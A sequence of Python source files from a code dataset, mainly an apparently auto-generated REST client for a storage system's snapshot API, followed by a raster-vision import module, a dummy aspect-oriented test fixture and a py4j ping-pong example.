_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_repstates(self, **kwargs): # noqa: E501
"""list_snapshot_repstates # noqa: E501
List all repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_repstates(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstatesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_repstates_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_repstates_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_repstates_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_repstates # noqa: E501
List all repstates. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_repstates_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstatesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_repstates" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_repstates`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_repstates`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_repstates`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_repstates`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotRepstatesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_schedules(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_schedules_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_schedules # noqa: E501
List all or matching schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_schedules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, pattern, schedule, duration, alias, next_run, and next_snapshot. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotSchedulesExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'limit', 'dir', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_schedules" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_schedules`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSchedulesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_snapshots(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_snapshots_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'schedule', 'resume', 'state', 'limit', 'type', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_snapshots" % key
)
params[key] = val
del params['kwargs']
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
if 'state' in params:
query_params.append(('state', params['state'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSnapshotsExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_snapshot_alias(self, snapshot_alias, snapshot_alias_id, **kwargs): # noqa: E501
"""update_snapshot_alias # noqa: E501
Modify snapshot alias. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_alias(snapshot_alias, snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAlias snapshot_alias: (required)
:param str snapshot_alias_id: Modify snapshot alias. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_snapshot_alias_with_http_info(snapshot_alias, snapshot_alias_id, **kwargs) # noqa: E501
else:
(data) = self.update_snapshot_alias_with_http_info(snapshot_alias, snapshot_alias_id, **kwargs) # noqa: E501
return data
def update_snapshot_alias_with_http_info(self, snapshot_alias, snapshot_alias_id, **kwargs): # noqa: E501
"""update_snapshot_alias # noqa: E501
Modify snapshot alias. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_alias_with_http_info(snapshot_alias, snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotAlias snapshot_alias: (required)
:param str snapshot_alias_id: Modify snapshot alias. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias', 'snapshot_alias_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias' is set
if ('snapshot_alias' not in params or
params['snapshot_alias'] is None):
raise ValueError("Missing the required parameter `snapshot_alias` when calling `update_snapshot_alias`") # noqa: E501
# verify the required parameter 'snapshot_alias_id' is set
if ('snapshot_alias_id' not in params or
params['snapshot_alias_id'] is None):
raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `update_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_alias_id' in params:
path_params['SnapshotAliasId'] = params['snapshot_alias_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_alias' in params:
body_params = params['snapshot_alias']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases/{SnapshotAliasId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_snapshot_schedule(self, snapshot_schedule, snapshot_schedule_id, **kwargs): # noqa: E501
"""update_snapshot_schedule # noqa: E501
Modify the schedule. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_schedule(snapshot_schedule, snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSchedule snapshot_schedule: (required)
:param str snapshot_schedule_id: Modify the schedule. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_snapshot_schedule_with_http_info(snapshot_schedule, snapshot_schedule_id, **kwargs) # noqa: E501
else:
(data) = self.update_snapshot_schedule_with_http_info(snapshot_schedule, snapshot_schedule_id, **kwargs) # noqa: E501
return data
def update_snapshot_schedule_with_http_info(self, snapshot_schedule, snapshot_schedule_id, **kwargs): # noqa: E501
"""update_snapshot_schedule # noqa: E501
Modify the schedule. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_schedule_with_http_info(snapshot_schedule, snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSchedule snapshot_schedule: (required)
:param str snapshot_schedule_id: Modify the schedule. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule', 'snapshot_schedule_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule' is set
if ('snapshot_schedule' not in params or
params['snapshot_schedule'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule` when calling `update_snapshot_schedule`") # noqa: E501
# verify the required parameter 'snapshot_schedule_id' is set
if ('snapshot_schedule_id' not in params or
params['snapshot_schedule_id'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `update_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_schedule_id' in params:
path_params['SnapshotScheduleId'] = params['snapshot_schedule_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_schedule' in params:
body_params = params['snapshot_schedule']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_snapshot_settings(self, snapshot_settings, **kwargs): # noqa: E501
"""update_snapshot_settings # noqa: E501
Modify one or more settings. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_settings(snapshot_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSettingsExtended snapshot_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_snapshot_settings_with_http_info(snapshot_settings, **kwargs) # noqa: E501
else:
(data) = self.update_snapshot_settings_with_http_info(snapshot_settings, **kwargs) # noqa: E501
return data
def update_snapshot_settings_with_http_info(self, snapshot_settings, **kwargs): # noqa: E501
"""update_snapshot_settings # noqa: E501
Modify one or more settings. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_settings_with_http_info(snapshot_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSettingsExtended snapshot_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_snapshot_settings" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_settings' is set
if ('snapshot_settings' not in params or
params['snapshot_settings'] is None):
raise ValueError("Missing the required parameter `snapshot_settings` when calling `update_snapshot_settings`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_settings' in params:
body_params = params['snapshot_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/settings', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_snapshot_snapshot(self, snapshot_snapshot, snapshot_snapshot_id, **kwargs): # noqa: E501
"""update_snapshot_snapshot # noqa: E501
Modify snapshot. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_snapshot(snapshot_snapshot, snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshot snapshot_snapshot: (required)
:param str snapshot_snapshot_id: Modify snapshot. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_snapshot_snapshot_with_http_info(snapshot_snapshot, snapshot_snapshot_id, **kwargs) # noqa: E501
else:
(data) = self.update_snapshot_snapshot_with_http_info(snapshot_snapshot, snapshot_snapshot_id, **kwargs) # noqa: E501
return data
def update_snapshot_snapshot_with_http_info(self, snapshot_snapshot, snapshot_snapshot_id, **kwargs): # noqa: E501
"""update_snapshot_snapshot # noqa: E501
Modify snapshot. All input fields are optional, but one or more must be supplied. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_snapshot_snapshot_with_http_info(snapshot_snapshot, snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshot snapshot_snapshot: (required)
:param str snapshot_snapshot_id: Modify snapshot. All input fields are optional, but one or more must be supplied. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot', 'snapshot_snapshot_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot' is set
if ('snapshot_snapshot' not in params or
params['snapshot_snapshot'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot` when calling `update_snapshot_snapshot`") # noqa: E501
# verify the required parameter 'snapshot_snapshot_id' is set
if ('snapshot_snapshot_id' not in params or
params['snapshot_snapshot_id'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `update_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_snapshot_id' in params:
path_params['SnapshotSnapshotId'] = params['snapshot_snapshot_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_snapshot' in params:
body_params = params['snapshot_snapshot']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| StarcoderdataPython |
8058007 | <reponame>alexchunet/raster-vision
# flake8: noqa
from rastervision2.pipeline.file_system.file_system import (
FileSystem, NotReadableError, NotWritableError)
from rastervision2.pipeline.file_system.local_file_system import LocalFileSystem
from rastervision2.pipeline.file_system.http_file_system import HttpFileSystem
from rastervision2.pipeline.file_system.utils import *
| StarcoderdataPython |
3531758 | """Dummy dataset to test runner"""
# pylint: disable=R0201,W0613
class DummyPrimaryConcern(object):
"""Dummy primary concern"""
def true(self):
"""Notify inside function"""
print "In true"
def before(*args, **kwargs):
"""Before advice"""
print "Before true"
def after(*args, **kwargs):
"""After advice"""
print "After true"
class DummyRule(object):
"""Test rule"""
def __init__(self, errors):
"""Init rule with error container"""
self.errors = errors
@property
def aspects(self):
"""Return aspects for the rule"""
return {DummyPrimaryConcern: {r'true': dict(before=before, after_finally=after)}}
| StarcoderdataPython |
6586586 | <reponame>Asnebula/test_java_env<filename>src/py4j/examples/_3_4_MultiThread/single/PythonPlayer.py
class PythonPlayer(object):
def start(self, player):
return player.firstPing(self)
def firstPong(self, player):
return player.secondPing(self)
def secondPong(self, player):
return "Success"
class Java:
implements = ["py4j.examples._3_4_MultiThread.single.PongPlayer"]
# Start the JVM with "java -cp py4j.jar py4j.examples._3_4_MultiThread.single.SingleThreadApplication"
from py4j.clientserver import ClientServer, JavaParameters, PythonParameters
gateway = ClientServer(
java_parameters=JavaParameters(),
python_parameters=PythonParameters())
ping_player = gateway.jvm.py4j.examples._3_4_MultiThread.single.PingPlayer()
pong_player = PythonPlayer()
print(pong_player.start(ping_player)) | StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.